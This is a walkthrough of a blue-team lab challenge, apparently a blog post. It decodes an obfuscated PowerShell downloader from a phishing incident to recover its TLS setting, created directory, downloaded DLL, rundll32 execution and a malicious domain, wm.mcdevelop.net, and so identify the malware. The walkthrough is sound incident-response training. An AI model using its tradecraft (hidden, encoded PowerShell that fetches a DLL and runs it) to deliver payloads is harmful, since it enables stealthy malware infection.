BTLO —Malicious PowerShell Analysis
Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team — all you have is an encoded Powershell script. Can you decode it and identify what malware is responsible for this attack?
Download the .zip and enter the password btlo to access the files.
This challenge requires analysis of a PowerShell script. CyberChef is often a useful tool for this sort of analysis.
POwersheLL -w hiddenmeans that a hidden PowerShell window (invisible to the user) is opened, and -ENCOD,shorthand for encoded shows that the script was encoded with Base64.
What security protocol is being used for the communication with a malicious domain?
The first thing to do is recognise that the PowerShell payload is base64 encoded. We can overcome this hurdle easily with From Base64 in CyberChef. I like to use Regular Expression to extract the encoded string, but it can just be copied directly. After decoding, it looks pretty messed up and clearly obfuscated. Remove null bytes and Generic Code Beautify will help with readability a little bit.
The next step would be to try to determine what’s going on.
Some of the . characters are removed as part of removing null bytes or regex, but we can still spot reference to Security Protocol and probably work out the type; TLS 1.2.
What directory does the obfuscated PowerShell create? (Starting from \HOME\)
Again, we can read through the obfuscated decoded script and locate something that resembles \HOME\. This is unfortunately too obfuscated to uncover at a glance, but we can take this over to something like https://code.visualstudio.com/ or https://notepad-plus-plus.org/ and manually try to deobfuscate.
It looks to be relatively simple string concatenation with substitution of UOH to [string][char]92, which is \, for {0}. I added a commented line below to help determine the path.
A quicker way to do this, would to just copy the extract into PowerShell and let it pull it together for us.
What file is being downloaded (full name)?
Following a similar process, we see string concatenation again, but this time with variable referencing included too.
What is used to execute the downloaded file?
The file is a .dll file, which are libraries that contains a set of code and data for carrying out a particular activity to support an .exe. Normally an .exe calls a .dll, but they can be run standalone through rundll32.exe . We see evidence of this within the script.
What is the domain name of the URI ending in ‘/6F2gd/’
It looks like the URI string is a pretty long obfuscated string to work through. It might be easier to find/replace ', space, and + with blank characters to see what we’re left with.
This isnt perfect but gives us much clearer indication of what the URI ending in /6F2gd/is.
Again, an even easier way to do this is to just stick the string into PowerShell and see if it can deobfuscate it for us. The one we’re looking for is there at the end.
Based on the analysis of the obfuscated code, what is the name of the malware?
To find the name of the malware, the best place to start would be to take and search for strings that are relaivley unique to the script.
An easy one would be the URL identified previously wm.mcdevelop.net
Despite heavy obfucsation, we were able to read through the script and pull out key Indicators of Compromise, ultimately leading us to identifying the name of the malware.
